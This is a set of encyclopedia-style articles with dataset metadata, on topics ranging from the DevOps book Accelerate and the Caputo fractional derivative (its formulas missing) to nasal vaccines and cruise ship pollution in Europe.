Accelerate: The Science of Lean Software and DevOps: Building and Scaling High Performing Technology Organizations is a software engineering book co-authored by Nicole Forsgren, Jez Humble and Gene Kim from their time in the DORA team. The book explores how software development teams using Lean Software and DevOps can measure their performance and the performance of software engineering teams impacts the overall performance of an organization.
The book discusses their research conducted as part of the DORA team for the annual State of DevOps Reports. In total, the authors considered 23,000 data points from a variety of companies of various different sizes (from start-up to enterprises), for-profit and not-for-profit and both those with legacy systems and those with modern systems.
24 Key Capabilities
The authors outline 24 practices to improve software delivery which they refer to as "key capabilities" and group them into five categories.
Continuous Delivery
Use version control for all production artifacts
Automate your deployment process
Implement Continuous Integration
Use trunk-based development methods
Implement test automation
Support test data management
Shift Left on Security
Implement Continuous Delivery (CD)
Architecture
Use a Loosely Coupled Architecture
Architect for Empowered Teams
Product and Process
Gather and Implement Customer Feedback
Make the Flow of Work Visible through the Value Stream
Work in Small Batches
Foster and Enable Team Experimentation
Lean Management and Monitoring
Have a Lightweight Change Approval Processes
Monitor across Application and Infrastructure to Inform Business Decisions
Check System Health Proactively
Improve Processes and Manage Work with Work-In-Process (WIP) Limits
Visualize Work to Monitor Quality and Communicate throughout the Team
Cultural
Support a Generative Culture
Encourage and Support Learning
Support and Facilitate Collaboration among Teams
Provide Resources and Tools that Make Work Meaningful
Support or Embody Transformational Leadership
References
External links
CLOUD AND DEVOPS CONSULTING
QCon Plus (May 17-28): Stay Ahead of Emerging Software Trends Q&A on the Book Accelerate: Building and Scaling High Performance Technology Organizations
Computer programming books
Computer books | DevOps Research and Assessment | [
"Technology"
] | 1,151 | [
"Works about computing",
"Computer books"
] |
76,975,056 | https://en.wikipedia.org/wiki/Caputo%20fractional%20derivative | In mathematics, the Caputo fractional derivative, also called Caputo-type fractional derivative, is a generalization of derivatives for non-integer orders named after Michele Caputo. Caputo first defined this form of fractional derivative in 1967.
Motivation
The Caputo fractional derivative is motivated from the Riemann–Liouville fractional integral. Let be continuous on , then the Riemann–Liouville fractional integral states that
where is the Gamma function.
Let's define , say that and that applies. If then we could say . So if is also , then
This is known as the Caputo-type fractional derivative, often written as .
Definition
The first definition of the Caputo-type fractional derivative was given by Caputo as:
where and .
A popular equivalent definition is:
where and is the ceiling function. This can be derived by substituting so that would apply and follows.
Another popular equivalent definition is given by:
where .
The problem with these definitions is that they only allow arguments in . This can be fixed by replacing the lower integral limit with : . The new domain is .
Properties and theorems
Basic properties and theorems
A few basic properties are:
Non-commutation
The index law does not always fulfill the property of commutation:
where .
Fractional Leibniz rule
The Leibniz rule for the Caputo fractional derivative is given by:
where is the binomial coefficient.
Relation to other fractional differential operators
Caputo-type fractional derivative is closely related to the Riemann–Liouville fractional integral via its definition:
Furthermore, the following relation applies:
where is the Riemann–Liouville fractional derivative.
Laplace transform
The Laplace transform of the Caputo-type fractional derivative is given by:
where .
Caputo fractional derivative of some functions
The Caputo fractional derivative of a constant is given by:
The Caputo fractional derivative of a power function is given by:
The Caputo fractional derivative of an exponential function is given by:
where is the -function and is the lower incomplete gamma function.
References
Further reading
Ricardo Almeida, A Caputo fractional derivative of a function with respect to another function
Fractional calculus | Caputo fractional derivative | [
"Mathematics"
] | 453 | [
"Fractional calculus",
"Calculus"
] |
76,975,269 | https://en.wikipedia.org/wiki/Turkish%20Journal%20of%20Electrical%20Engineering%20and%20Computer%20Sciences | Turkish Journal of Electrical Engineering and Computer Sciences is a peer-reviewed scientific journal published by Scientific and Technological Research Council of Turkey (TÜBİTAK). Being a diamond open access journal, it covers all areas of electrical engineering and computer science. Its editor-in-chief is Muhammet Uzuntarla (Gebze Technical University).
Abstracting and indexing
The journal is abstracted and indexed in:
According to the Journal Citation Reports, the journal has a 2023 impact factor of 1.2.
References
External links
English-language journals
7 times per year journals
Academic journals established in 1993
Electrical and electronic engineering journals
Electrical Engineering and Computer Sciences, Turkish Journal of
Computer science journals | Turkish Journal of Electrical Engineering and Computer Sciences | [
"Engineering"
] | 141 | [
"Electrical engineering",
"Electronic engineering",
"Electrical and electronic engineering journals"
] |
76,975,500 | https://en.wikipedia.org/wiki/Frequenz | Frequenz (German for "frequency") is a monthly peer-reviewed scientific journal published by De Gruyter. Established in 1947, it covers fundamental and applied research in radio-frequency engineering, microwave engineering and terahertz technology, as well as wireless communications. Its editor-in-chief is Rolf Jakoby (Technische Universität Darmstadt).
Abstracting and indexing
The journal is abstracted and indexed in:
According to the Journal Citation Reports, the journal has a 2022 impact factor of 1.1.
References
External links
English-language journals
Monthly journals
Academic journals established in 1947
Electrical and electronic engineering journals
De Gruyter academic journals
Electromagnetism journals | Frequenz | [
"Engineering"
] | 144 | [
"Electrical engineering",
"Electronic engineering",
"Electrical and electronic engineering journals"
] |
76,975,616 | https://en.wikipedia.org/wiki/Key%20Transparency | Key Transparency allows communicating parties to verify public keys used in end-to-end encryption. In many end-to-end encryption services, to initiate communication a user will reach out to a central server and request the public keys of the user with which they wish to communicate. If the central server is malicious or becomes compromised, a man-in-the-middle attack can be launched through the issuance of incorrect public keys. The communications can then be intercepted and manipulated. Additionally, legal pressure could be applied by surveillance agencies to manipulate public keys and read messages.
With Key Transparency, public keys are posted to a public log that can be universally audited. Communicating parties can verify public keys used are accurate.
See also
Certificate Transparency
References
Cryptography
End-to-end encryption
Public-key cryptography | Key Transparency | [
"Mathematics",
"Engineering"
] | 162 | [
"Applied mathematics",
"Cryptography",
"Cybersecurity engineering"
] |
76,975,879 | https://en.wikipedia.org/wiki/Debate%20between%20tree%20and%20reed | The Debate between tree and reed (CSL 5.3.4) is a work of Sumerian literature belonging to the genre of disputations poem. It was written on clay tablets and dates to the Third Dynasty of Ur (ca. mid-3rd millennium BC). The text was reconstructed by M. Civil in the 1960s from 24 manuscripts but it is currently the least studied of the disputation poems and a full translation has not yet been published. Some other Sumerian disputations include the dispute between bird and fish, cattle and grain, and Summer and Winter.
Synopsis
The poem begins with a cosmogonic prologue describing the copulation between Heaven (An) and Earth (Ki). Earth gives birth to vegetation, and for the purpose of the poem, this prominently includes Tree and Reed. Though they are first in harmony, a disputation begins between the two as they enter into a shrine. Reed, who fails to respect the proper order of things, steps in front of Tree, causing the latter to be infuriated. The prologue covers the first 49 lines, after which the disputation proceeds for another two hundred lines. It is divided into four speeches: Tree speaking (lines 50–91), Reed speaking (96–137), Tree speaking again (144–191), Reed speaking again (197–228). The adjudication scene (230–254) begins with Tree invoking the judgement of Shulgi (a king), who declares that Tree has prevailed over Reed. The poem also mentions the king Puzrish-Dagan, suggesting its composition during his time.
Partial translation
The following translation of the introductory cosmogonic section of the Disputation, containing only the first 10 lines, is taken from Lisman 2013. The first 25 lines were published by Van Dijk in 1965 but a translation of the entire text has still not been made.1 The large surface of the earth introduced herself; then she has embellished herself as with a bardul-garment.
2 The vast earth has filled her exterior with precious metals and lapis lazuli.
3 With diorite, nir-stone, cornelian, and suduaga she has adorned herself.
4 The earth, the fragrant vegetation, covered herself with attractiveness. She stood in her magnificence.
5 The pure earth, the virgin earth, has beautified herself for the holy An.
6 An, the exalted heaven, had intercourse with the vast earth.
7 He poured the seed of the hero's Tree and Reed into her womb.
8 The whole earth, the fecund cow, took the good seed of An under her care.
9 The earth, life-giving vegetation, innerly happy, devoted herself to the production of it (i.e. the vegetation).
10 The earth, full of joy, bore abundance, while juice and syrup gave out their smell.
Historical context
In Mesopotamian disputation literature, debates between trees is a recurring theme. In Akkadian disputations, examples include the Tamarisk and Palm, Palm and Vine, and Series of the Poplar. A much later example from Aesop's fables is The Oak and the Reed.
References
Citations
Sources
Clay tablets
Comparative mythology
Creation myths
Mesopotamian myths
Religious cosmologies
Sumerian disputations | Debate between tree and reed | [
"Astronomy"
] | 694 | [
"Cosmogony",
"Creation myths"
] |
76,976,005 | https://en.wikipedia.org/wiki/Crystallographic%20Society%20of%20Japan | The Crystallographic Society of Japan (日本結晶学会 in Japanese) is a scientific organization in Japan focused on research and education of crystallography. It was established on May 13, 1950 with Shoji Nishikawa as the founding president, and it is an independent academic society. The core publication of the society is the Journal of the Crystallographic Society of Japan, which was first issued in 1959.
The society is affiliated with the International Union of Crystallography and the Asian Crystallographic Association.
See also
Chemical Society of Japan
International Union of Crystallography
German Crystallographic Society
References
Scientific organizations based in Japan
Professional associations based in Japan
Crystallography organizations
Scientific organizations established in 1950 | Crystallographic Society of Japan | [
"Chemistry",
"Materials_science"
] | 144 | [
"Crystallography stubs",
"Materials science stubs",
"Crystallography",
"Crystallography organizations"
] |
76,977,700 | https://en.wikipedia.org/wiki/Jennifer%20Key | Jennifer Denise Key (née Hicks) is a retired South African mathematician whose research has concerned the interconnections between group theory, finite geometry, combinatorial designs, and coding theory. She is a professor emeritus at Clemson University in the US, and an honorary professor at Aberystwyth University in the UK, and the University of KwaZulu-Natal and University of the Western Cape in South Africa.
Education and career
Key graduated with honours from the University of the Witwatersrand in 1963, and went to the University of London for graduate study in mathematics, earning a master's degree in 1967 and completing her Ph.D. in 1969. Her dissertation, Some Topics in Finite Permutation Groups, was supervised by Ascher Wagner.
She worked as an academic in England, at the University of Surrey, University of Reading, University of Manchester, and University of Birmingham, before moving to the US in 1990 to take a faculty position at Clemson University. She retired as professor emeritus in 2007.
Book
Key is the author, with Edward F. Assmus Jr., of the book Designs and Their Codes (Cambridge University Press, 1992).
References
External links
Home page
Year of birth missing (living people)
Living people
South African mathematicians
South African women scientists
Women mathematicians
Coding theorists
Combinatorialists
Group theorists
University of Johannesburg alumni
Alumni of the University of London
Academics of the University of Surrey
Academics of the University of Reading
Academics of the University of Manchester
Academics of the University of Birmingham
Clemson University faculty | Jennifer Key | [
"Mathematics"
] | 305 | [
"Combinatorialists",
"Combinatorics"
] |
65,368,595 | https://en.wikipedia.org/wiki/Nasal%20vaccine | A nasal vaccine is a vaccine administered through the nose that stimulates an immune response without an injection. It induces immunity through the inner surface of the nose, a surface that naturally comes in contact with many airborne microbes. Nasal vaccines are emerging as an alternative to injectable vaccines because they do not use needles and can be introduced through the mucosal route. Nasal vaccines can be delivered through nasal sprays to prevent respiratory infections, such as influenza.
History
Nasal inoculation dates as far back as the 17th century in China during the Kangxi Emperor’s reign. Documentation during this period indicates that the Kangxi Emperor vaccinated his family, army, and others for mild smallpox. Manuals detailing vaccination techniques at the time all focused on sending smallpox up the nose of the individual being vaccinated. Although other vaccination techniques were developed using an infected individual’s scabs, a common method was to place a cotton swab with the fluid from an infected person’s pustule up the nose.
Following smallpox, influenza became a prominent focus for nasal vaccine development. The first live attenuated influenza vaccine (LAIV) in the form of a nasal spray was created in Russia by the Institute of Experimental Medicine in 1987. This nasal vaccine development was based on the Russian backbone of LAIV while nasal vaccines since then have been based on other LAIV backbones. The first nasal influenza vaccine was released in the United States in 2001 but was taken off the market due to toxicity concerns. FluMist, one of the most prominent nasal LAIVs, was released in 2003 as nasal LAIVs continued developing.
Anthrax attacks at the beginning of the 21st century caused a demand for nasal vaccine development. As anthrax is an airborne substance that can be inhaled, a nasal vaccine has the potential to be used to protect individuals from the effects it can have on the respiratory system. Following the September 11, 2001 terrorist attacks in the United States, several individuals at news stations and U.S. senators died after being sent letters with anthrax as an act of bioterrorism. Nasal vaccine research and development against anthrax was encouraged by the U.S. government in an effort to vaccinate troops. BioThrax, the current anthrax vaccine that is licensed and administered in the United States, requires up to five intramuscular injections and annual boosters; research within the past decade has developed an alternative nasal vaccine that follows the path of infection for anthrax and induces both humoral and cellular immune responses.
The global COVID-19 pandemic led to a rise in nasal vaccines against coronavirus. International efforts for vaccine development occurred as countries such as India, Iran, Russia, and China created nasal COVID-19 vaccines.
Administration
Nasal vaccines are a subsection of mucosal immunization as they use a mucosal route for vaccine delivery. As many pathogens can enter the body through the nose, nasal vaccines take advantage of this mechanism to deliver the vaccine. The nose has multiple lines of defense to prevent pathogens from entering further into the body. Nasal hairs are the first defense as they are at the entrance of the nose and prevent large particles from entering. The mucus layer in the nasal cavity can trap smaller particles that get past the nose hairs. The nasal cavity has a large vascularization network so particles can go through the epithelial layer and directly enter the bloodstream. Intruding particles will interact with the mucosal immune system if they reach the nasal mucosa. The mucosal immune system is composed of lymphoid tissue, B cells, T cells, and antigen-presenting cells. These different types of cells work together to identify intruding particles and trigger an immune response. Nasal vaccines must overcome these barriers and get clearance to deliver the viral antigen to patients.
Nasal vaccines can come in different forms such as solutions (liquids), powders, gels, and solid inserts. The most prevalent type of nasal vaccine in research and clinical application is solutions due to its ease of use. Although solutions are usually pipetted into test subjects’ nostrils when conducting animal trials for nasal vaccines, nasal sprays are considered the most practical approach for mass human vaccination using nasal vaccines. A nasal spray is able to bypass the initial layers of the nasal mucosa and deliver the vaccine particles directly to the mucoadhesive layer. The antigen in the nasal vaccine can then trigger an immune response and prevent infection due to nasal vaccines’ accessibility to the immune system.
Nasal sprays are commonly used for delivering drugs in addition to vaccines. Decongestant drugs are often directly delivered to the nose through nasal sprays. Cold and allergy medication can be administered using nasal sprays for local delivery by bypassing nasal hairs and being introduced to the nasal cavity. Intranasal administration can have less drug degradation compared to oral administration because of direct particle delivery. Peptide drugs used for hormone treatments can be delivered nasally through nasal sprays instead of orally to retain particle integrity. Nasal sprays can also be used to deliver diabetes treatment, steroids, and intranasal oxytocin to induce labor. Nasal administration is also used to deliver anesthetics and sedatives due to direct access to the mucosal immune system and bloodstream.
The olfactory epithelium makes up approximately 7% of the surface area of the nasal cavity and is connected to the olfactory bulb in the brain. Drugs and vaccines can be delivered to the brain past the blood-brain barrier through olfactory nerve cells.
Compared to injectable vaccines, nasal vaccines can be advantageous because they are safe, painless, and easy to use. Nasal vaccines do not require a needle, which eliminates pain from needlestick injuries and safety concerns due to cross-contamination and needle disposal. Some studies also show that intranasal vaccines can generate cross-reactive antibodies that could lead to cross-protection.
Live attenuated influenza vaccine
The live attenuated influenza vaccine (LAIV) in the form of a nasal spray was one of the first nasal vaccines released on the market. Nasal spray LAIVs have been used since the late 1980s as an alternative to the injectable influenza vaccine. Nasal influenza vaccines have become popular as they reduce the risk of intramuscular injuries from administration and are painless. They can also be given more easily to patients because they do not require a needle.The most prominent nasal LAIV is FluMist, which was released in 2003. FluMist, officially known as FluMist Quadrivalent in the United States and Fluenz in Europe, is known to be the only flu vaccine on the market that does not use a needle. All nasal LAIVs for recent flu seasons (2022-2023) are considered quadrivalents because “they are designed to protect against four types of flu viruses: an influenza A(H1N1) virus, an influenza A(H3N2) virus and two influenza B viruses.” Although injectable and nasal LAIVs are presented as options for yearly vaccination against influenza, FluMist was pulled off of the United States market from 2016 to 2018 due to its inefficiency against a common influenza strain in children. Since then, FluMist has been reformulated and has re-entered the market. The active ingredients in nasal LAIVs are grown in fertilized chicken eggs. The practice of growing viruses in chicken eggs is common in vaccine production because these viruses need to be grown inside cells. Virus fluid from the incubated chicken eggs is extracted and killed for the viral antigen to be purified for LAIV production. Similar to other vaccines, nasal LAIVs contain ingredients in addition to the viral antigen. Stabilizers such as gelatine, arginine hydrochloride, monosodium glutamate, and sucrose are commonly used in vaccines to assure the vaccines are still effective during and after production, transportation, and storage as well as delivery. Stabilizers are especially important for nasal vaccines as proteases and amino-peptidase in the mucosal membrane can degrade proteins and peptides in vaccines. Research continues to improve nasal LAIVs as influenza affects nearly 9 million people. As influenza changes slightly each year, continuous research on new strains can improve vaccine efficiency. Research on nasal vaccine development for nontypeable Haemophilus influenzae shows that the vaccine binding to surface proteins prevented biofilm formation. As a result, this vaccine can have the potential to treat ear infections caused by biofilm from influenza infection. New components like α-galactosylceramide (α-GalCer) are also being researched to be used as nasal vaccines against influenza. Since α-GalCer induced immune responses when immunized with a replication-deficient live adenovirus, there is evidence that nasal LAIVs can be co-immunized with other treatments against influenza.
Intranasal COVID-19 vaccines
Prior to the 2020 global COVID-19 pandemic, animal studies in 2004 on African green monkeys tested a SARS-associated coronavirus (SARS-CoV) vaccine and showed that these monkeys did not emit the virus from their upper respiratory tract after being infected. Since then, several intranasal COVID-19 vaccines have been developed with the onset of the COVID-19 pandemic. inCOVACC, Razi Cov Pars, Sputnik, and Convidicia are nasal COVID-19 vaccines that were developed throughout the world to improve vaccine availability and reduce the spread of COVID-19.
In August 2020, during the COVID-19 pandemic, studies in mice and monkeys demonstrated that protection from the new coronavirus might be obtained through the nasal route. Another study postulated that if a COVID-19 vaccine could be given by a spray in the nose, people might be able to vaccinate themselves. Research about the main characteristics of nasal spray vaccines that can affect the efficiency of vaccine delivery for COVID-19 indicates that the spray cone angle can impact the delivery efficiency; droplet initial velocity and composition did not have as much of an impact on nasal vaccine efficiency as the spray cone angle.
India and China approved inCOVACC and Convidecia, respectively, to be used as boosters for those who have already received at least two COVID-19 vaccine doses. Although nasal COVID-19 vaccine research continues in the United States, lack of government funding could prevent this research from moving on to human trials to get approval for public administration. Privately funded research for nasal COVID-19 vaccines is starting to reach clinical trials; a nasal COVID-19 vaccine by Blue Lake Biotechnology has started its Phase 1 clinical trials as of late February 2023. Scientists speculate that nasal vaccines might have an advantage over other types of vaccines because they provide immune defense at the site of administration.
Applications to veterinary medicine
Species other than humans use nasal vaccines to prevent diseases. Intranasal vaccines are used on dogs for Bordetella bronchiseptica to prevent infectious tracheobronchitis (ITB). ITB, commonly known as kennel cough, typically spreads in highly populated environments such as kennels and dog shelters. Consistent vaccination against ITB using an intranasal vaccine can create an immune response to protect the vaccinated dog. Consistent vaccination against ITB using an intranasal vaccine can create an immune response to protect the vaccinated dog.
Cattle receive nasal vaccines against diseases such as bovine herpesvirus 1, parainfluenza type 3, and bovine rhinotracheitis virus. As all three of these viruses are related to respiratory infection, using an intranasal route can bring the vaccine directly to the respiratory system.
Recent discoveries indicate that rainbow trout have a previously unknown lymphoid structure in their nasal cavity. This structure allows them to have fast innate and adaptive responses to nasal vaccines.
Research
Current research is exploring new technologies and developments to improve nasal vaccine delivery methods. Particle size and characteristics have become a focus of research as smaller particles can travel more easily to reach the epithelial layer of the nasal cavity compared to larger particles. Nanoparticles and nanosystems are being researched to optimize nasal delivery. Coated nanoparticles are an area of focus due to their properties to induce immune effects. Glycol chitosan-coated nanoparticles induced more of an immune response compared to the other types of nanoparticles. Nanocarriers designed based on the characteristics of the nasal epithelium can be used to deliver nasal vaccines and can therefore make nasal vaccination more accessible. Polymeric nanosystems are also being developed to deliver vaccines to target sites while preventing them from degrading; current research is focused on understanding the material and physical properties of biodegradable materials to be used in nanosystems to improve vaccine efficacy. Research on the movement of nasal vaccine particles is focused on developing more effective ways for these vaccines to enter the body. An animal study on mice tested how a nasal vaccine can bypass issues with entry into the nasal epithelium by taking advantage of ciliary movement. The results indicated that tubulin tyrosine ligase-like family member 1 (Ttll1) knockout mice had higher levels of the vaccine antigen compared to the hetero mice.
See also
Nasal administration
Mucosal immunology
References
Vaccination
Drug delivery devices | Nasal vaccine | [
"Chemistry",
"Biology"
] | 2,758 | [
"Pharmacology",
"Vaccination",
"Drug delivery devices"
] |
65,369,927 | https://en.wikipedia.org/wiki/Cruise%20ship%20pollution%20in%20Europe | Cruise ship pollution in Europe is a major part of the environmental impact of shipping. Most cruise ship companies operating in European exclusive economic zones (EEZs) are part of two mega corporations: Carnival Corporation & plc and the Royal Caribbean Group. In 2017, Carnival's cruise ships alone caused ten times more sulfur oxide (SOx) air pollution than all of Europe's cars (over 260 million) combined, as the ship fuel emits about 2,000 times more sulfur oxides than normal diesel fuel. All cruise ships together also accounted for 15% of the nitrogen oxide (NOx) particles emitted by all of Europe's passenger vehicles, and released large amounts of carbon dioxide (CO2), phosphorus (P4), soot, heavy metals, and other particulates into the atmosphere as well.
Background
Modern cruise ships evolved from ocean liners, which were the most common mode of transportation between Europe and the Americas until the rise of commercial aviation in the 1950s. Airliners drastically cut trans-Atlantic travel times and formed unbeatable competition for ocean liners in speed. To survive, the sector began to transform its ocean liners into cruise ships in the mid-1960s by attracting passengers by focusing the voyage on recreation and sightseeing, and less on getting travelers from A to B. Cruise lines such as Norwegian (1966), Royal Caribbean International (1968) and Carnival Cruise Line (1972) were founded in rapid succession, and over the course of years managed to expand by building ever larger cruise ships with more and more passengers (21 million globally in 2013), which increasingly negatively impacted the environment.
Most polluted port cities and countries
According to a 2019 study by Transport & Environment, the following European port cities were most polluted by cruise ships docking there (data from 2017):
Barcelona, Spain: 32.8 tonnes of SOx
Palma de Mallorca, Spain: 28 tonnes of SOx
Venice, Italy: 27.5 tonnes of SOx
Southampton (including Marchwood), United Kingdom: 27.1 tonnes of SOx
Civitavecchia (near Rome), Italy: 22.3 tonnes of SOx
Piraeus (near Athens), Greece: 21 tonnes of SOx
Funchal (on Madeira), Portugal: 18 tonnes of SOx
Livorno, Italy: 16.3 tonnes of SOx
Lisbon, Portugal: 16.1 tonnes of SOx
Santa Cruz de Tenerife, Spain: 15.6 tonnes of SOx
The following European countries have been most exposed to air pollution by cruise ships (data from 2017):
Spain: 14,496 tonnes of SOx
Italy: 13,895 tonnes of SOx
Greece: 7,674 tonnes of SOx
France: 5,950 tonnes of SOx
Norway: 5,261 tonnes of SOx
Fuel
The most commonly used fuel type for cruise ships is so-called heavy fuel oil (also called bunker oil or marine fuel), which is relatively cheap but highly pollutive. Although diesel fuel (also known as gas oil) can work as a low-sulfur alternative, this tends to be 33–35% more expensive on average. According to Deutsche Welle, 'an average-sized cruise ship carrying 2,000 passengers uses 150 tonnes a day when it's at sea; in port, it requires an average of 50 tonnes to meet the liner's electricity demands.' TRT World stated that ships like the Harmony of the Seas burn 'up to 4,900 litres of fuel per hour, 249,000 litres of fuel per day'. Clean Air Southampton claimed that giant vessels such as Navigator of the Seas require as much power as a town of 50,000 inhabitants when docked.
A 2018 study carried out by Naturschutzbund Deutschland (Nature Protection League Germany, NABU) reviewed the emissions of 77 cruise ships (almost the entire fleet in European waters), concluding that only one of them, AIDAnova, was not powered by highly polluting heavy fuel, but relatively 'clean' liquefied natural gas (LNG), which reduces NOx and particulate emissions by about 80%. However, even though shifting all cruise ships to LNG would be very beneficial to human health, LNG also contains methane, which is a very potent greenhouse gas and could increase global warming significantly through leaks and incomplete combustion.
Waste streams
Aside from air pollution, cruise ships produce various waste streams, namely wastewater from sinks, showers, and galleys (grey water), hazardous wastes, solid waste, oily bilge water, and ballast water.
Risks
Human health
Sulfur oxide (SOx) emissions form sulphate (SO4) aerosols that contribute to health risks in humans. SOx, fine particles (PM2.5) and nitrogen oxides (NOx) cause premature death by various means such as lung cancer, throat cancer, chronic obstructive pulmonary disease (COPD), cardiovascular diseases, and morbidity such as childhood asthma. Transport & Environment estimated that about 50,000 people a year in Europe die prematurely because of pollution from the shipping sector as a whole. This primarily affects people who live in harbour cities. In some cruise ports such as Southampton, children may be exposed to the polluted air when school playgrounds are near the docks. In Marseille, residents have been diagnosed with respiratory-related cancers at abnormally high rates after the cruise industry boomed.
Aside from the locals, measuring has shown that passengers are exposed to heightened concentrations of nitrogen oxides during their voyage. For example, Canadian environmental researchers, who had secretly conducted air quality tests at various times and places aboard four Carnival Corporation cruises, reported in 2019 that they 'found that levels of ultra-fine particulate matter at the back of the ship behind the smokestacks while the ship was moving that were comparable to some of the world's most polluted cities like Beijing and Santiago.' Carnival dismissed the claims as 'completely ridiculous', asserting its ships 'meet or exceed every requirement'. A University of British Columbia scientist also questioned some of the report's more drastic claims but agreed with the group's general conclusions about cruise shipping from an air pollution and climate change perspective.
Environment
The emissions contribute to ocean acidification and soil acidification. Nitrogen oxides also stimulate particle and ozone formation.
Damage to buildings
In addition to causing the third-worst air pollution in any port city in Europe, cruise ships passing through the Giudecca Canal damage building foundations of historical Venice, a World Heritage Site, as well as blocking the view of inhabitants and other tourists. A week after the 12 January 2012 Costa Concordia disaster, UNESCO urged Venetian authorities to restrict the future access of cruise ships to Venice and other Italian ports with vulnerable cultural historic architecture. That year, over 600 passenger ships docked in Venice, about 300 of which were categorised as mega-cruises (featuring thousands of passengers and ten decks), together carrying between 1.6 and 2 million passengers. In subsequent years, the city of Venice, for whom tourism is of critical importance, tried to reach a compromise with cruise lines, but in August 2014 the Italian government interfered by prohibiting ships surpassing the weight of 96,000 tonnes from getting near the historic centre in 2015. Plans to divert a third of the cruises were announced by Transport Minister Danilo Toninelli in August 2019, after MSC Opera crashed into a smaller river cruise ship and a quay in Venice on 2 June 2019, injuring five people; however, Toninelli's plans were criticised as unrealistic by activists and other politicians.
Regulations
International treaties
The International Maritime Organization (IMO) is the United Nations' agency for the regulation of international shipping, founded in 1948. The IMO's International Convention for the Prevention of Pollution from Ships, better known as MARPOL 73/78 (effective since 1983, and later expanded), set the most important international standard in containing the environmental pollution of shipping. Amongst other things, it prohibited any kind of dumping within three nautical miles of a coastline, and set limits on sulfur and nitrogen oxide emissions from ships.
In international law, the maximum sulfur oxide concentration in cruise ship emissions at full sea is 0.5% from 1 January 2020 onwards. This standard (sometimes called "IMO 2020") was recommended by a United Nations subcommittee in 2008, and adopted by the IMO in 2016. Previously, the maximum concentration at full sea was set at 3.5%. Since the most commonly used heavy fuel oil was still deemed to have an average sulfur content of around 2.7% as of July 2019, this was a major shift in oil market history, and ship companies found in violation of the new regulation could face huge penalties when caught by authorities.
The Ballast Water Management Convention, aimed at preventing problems such as the dispersal of invasive species, entered into force on 8 September 2017, and will fully apply on 8 September 2024.
However, shipping falls outside many international agreements such as the 1997 Kyoto Protocol and the 2015 Paris Agreement, and ships are also excluded from many national regulations because they move between countries, often through international waters. These aspects make it legally difficult to assign responsibility to a particular government authority, and practically difficult to check how much (cruise) ships emit and to enforce sanctions in case of violations.
Emission Control Areas
Sulfur Emission Control Areas (SECAs) mandate the most stringent marine sulfur fuel emission standard, but even in these areas cruise ship air pollution can remain a major issue. Moreover, as of 2017 there were only two SECAs in Europe, namely in the Baltic Sea and the North Sea, not in the rest of Europe's waters. The best marine sulfur standard (0.1% or 1000 parts per million) remains 100 times worse than Europe's sulfur standard for road diesel/petrol (0.001% or 10 parts per million) in place during 2004–2019. Protesters in the Port of Antwerp, whose 2019 anti-cruise petition was supported by 15,000 citizens, noted the paradox that the city of Antwerp has a low-emission zone for cars and other road vehicles, but highly pollutive cruise ships can just dock close to the city centre with only minor restrictions.
Docking restrictions
While docking, berthing or mooring in populated places for several hours, cruise ships such as the Harmony of the Seas are required to use auxiliary engines that burn low sulfur fuel, or use abatement technologies, in order to reduce the amount of air pollution they cause to the detriment of local inhabitants. However, critics say these measures are not enough to ensure their health.
Activists have pushed for cruises to be using electricity from the shore (known as "shore power" or "cold ironing") during docking hours, but cruise lines have resisted this alternative. Shore power is already common in the United States, Canada and some European ports (however, as of April 2019, only two European ports are able to generate enough electricity to fully-power cruise ships with their engines turned off), and Southampton planned to become the first port in Britain to introduce it in 2020 as well. Disadvantages from shore power include the drain on mains electricity and the required financial investment in installing the necessary infrastructure. According to CLIA, 28% of cruises used shore power in April 2019. The European Commission has ordered all ports in the European Union to make shore power available by 2025, unless there is no demand or the costs are higher than the environmental benefits.
Court cases
In 2016, Princess Cruises (a British-American subsidiary of Carnival Corporation that operates in Europe and North America) was condemned by the Court of Miami to pay 40 million U.S. dollars in damages for illegally dumping oil at sea in order to cut waste disposal costs. Initially, it was sued only for dumping 4,227 gallons (16,000 litres) of oil-contaminated waste about off the coast of England on 26 August 2013 using a "magic pipe" from the Caribbean Princess. But later, authorities discovered that Princess Cruises had been committing this illegal pollution since 2005, and four other ships were found guilty of the same crime, and that onboard sensors were manipulated to avoid detecting seawater pollution. For violation of the probation terms of 2016, Carnival and Princess were ordered to pay an additional $20 million penalty in 2019. The new violations included discharging plastic into waters in the Bahamas, falsifying records, and interfering with court supervision.
In July 2018, for the first time in the French Mediterranean, the captain of a cruise ship, MS Azura, stood trial for breaking fuel emission limits in the port of Marseille.
Other solutions
Emissions and waste reduction
Catalytic converters could be installed to reduce the emissions of ships. In shipping, these are known as scrubbers. According to Cruise Lines International Association (CLIA), 60% of cruise ships already had a scrubber installed as of April 2019. This installation could be made mandatory by the EU. MSC Cruises claims that its MSC Grandiosa (built in 2016) has several filters which reduce its gas oil sulfur oxide emissions by 97%, and nitrogen oxide emissions by 80%. However, in October 2019 The Independent warned that most of the recently installed scrubbers (3,756 on ships, amongst which many cruise ships) were 'open-loop scrubbers', that enable sulfur extracted from the fumes to be transformed into a liquid that can be illegally discharged into the sea. These therefore constituted "cheat devices", intended to appear to comply with the IMO 2020 regulation, while violating it in reality. Only 65 out of the 3,756 scrubbers were closed-loop and could not be exploited for sulfur extract dumpings at sea, but only opened on land for the appropriately safe disposal there.
There are also oily water separators. According to CLIA, 62% of cruises filtered its wastewater (grey water) in April 2019.
Electric engines
It's possible to have ships run on electricity alone, especially for shorter distances such as between Sweden and Denmark. Electric engines do not emit any noxious gases (provided the electricity is clean), are silent and thus eliminate the noise pollution caused by internal combustion engines, and they require much less maintenance. On the other hand, electric batteries are relatively heavy, generate less power and speed overall, and need to be charged often, so they are less suitable over longer distances.
To reduce electricity consumption, some modern ships only use LED lamps.
Relocating terminals
The relocation of cruise ship passenger terminals away from densely populated areas to near surrounding towns or villages has been proposed in ports such as Venice, Antwerp and Amsterdam (Piet Heinkade), in order to reduce the number of local inhabitants exposed to air pollution (as well as spreading mass tourism more evenly). However, this has been met with protests from the surrounding towns and villages, who don't want the pollution and overtourism to spread to them instead, and the port cities themselves fear losing the economic benefits of tourism when the cruises dock too far away from where visitors will want to spend their money.
See also
Cruise ship pollution in the United States
Environmental impact of aviation
Phase-out of fossil fuel vehicles
Regulation of ship pollution in the United States
Short-haul flight ban
Notes
References
Climate change in Europe
Cruise lines
Environmental impact of shipping
Waste legislation in the European Union
Ocean pollution
Water pollution | Cruise ship pollution in Europe | [
"Chemistry",
"Environmental_science"
] | 3,084 | [
"Ocean pollution",
"Water pollution"
] |
